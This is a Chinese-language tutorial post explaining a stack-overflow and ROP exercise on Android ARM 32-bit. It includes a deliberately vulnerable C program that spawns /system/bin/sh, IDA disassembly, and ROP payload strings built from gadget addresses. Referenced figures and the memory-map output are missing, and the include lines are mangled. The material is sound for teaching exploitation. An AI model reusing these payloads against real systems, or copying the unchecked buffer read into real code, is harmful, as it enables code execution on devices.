一步一步學ROP之Android ARM 32位篇

一步一步學ROP之Android ARM 32位篇

0x00

本文僅解釋說明蒸米大神一步一步學ROP之Android ARM 32位篇，讀者應先閱讀這篇文章，遇到問題再來看我這篇文章。

0x01

第一個問題：payload = 'A'*132 + p32(callsystemaddr)，這個132是怎麼來的？

要回答這個問題，我們需要把level6.c反組譯碼，level6.c代碼如下：

#include#include#include void callsystem(){system("/system/bin/sh");} void vulnerable_function() {char buf[128];read(STDIN_FILENO, buf, 256);} int main(int argc, char** argv) {if (argc==2&&strcmp("passwd",argv[1])==0)callsystem();write(STDOUT_FILENO, "Hello, World\n", 13);    vulnerable_function();}

我們把使用ndk-build編譯後，產生的level6拖入ida pro中，找到vulnerable_function對應的反組譯碼代碼：

.text:00008564 sub_8564.text:00008564                 PUSH    {LR}.text:00008566                 MOVS    R2, #0x80.text:00008568                 SUB     SP, SP, #0x84.text:0000856A                 MOV     R1, SP.text:0000856C                 LSLS    R2, R2, #1.text:0000856E                 MOVS    R0, #0.text:00008570                 BL      sub_9414.text:00008574                 ADD     SP, SP, #0x84.text:00008576                 POP     {PC}.text:00008576 ; End of function sub_8564

參考ARM子函數定義中的參數放入寄存器的規則，這個函數對應下面的函數代碼：

void vulnerable_function() {char buf[128];read(STDIN_FILENO, buf, 256);}

R0對應STDIN_FILENO，buf對應SP-0X84，R2對應256，參數已經存入的寄存器，接著BL sub_9414就是調用read函數。那麼132是怎麼來的呢，我們來看一張圖：

 

下一個地址就是LR，也就是返回地址，覆蓋了這個地址，就會去執行對應的函數。

0x02

callsystemaddr = 0x00008554 + 1。這個地址是我們靜態分析時，callsystem在ida中的靜態地址。那麼當level在記憶體中載入並執行後，對應的虛擬位址還是這個嗎？答案是，是這個地址。我們可以使用cat /proc/pid/maps來觀察映射表。如：

0x03

payload = '\x00'*132 + p32(gadget1) + '\x00'*0xc + p32(r0) + '\x00'*0x4 + p32(gadget2) + p32(r1) + p32(r2) + p32(r4) + p32(r5) + p32(r6) + p32(write_addr_plt) + '\x00' * 0x84 + p32(ret_to_vul)，這裡為什麼'\x00' * 0x84 + p32(ret_to_vul)就返回到vulnerable_function函數呢？

答案是gadget2是write函數，write函數執行時首先會把LR壓入堆棧，此時的LR還是指向了.text:00008574 ADD SP, SP, #0x84，因為只執行了BL sub_9414，下一行的地址被存入LR，一直沒有變化。

當write函數執行完畢後，pop {pc}，繼續執行.text:00008574的代碼，也就是這兩句代碼.text:00008574 ADD SP, SP, #0x84 .text:00008576 POP {PC}，這樣就理解了為什麼寫成'\x00' * 0x84 + p32(ret_to_vul)就可以返回到vulnerable_function函數了。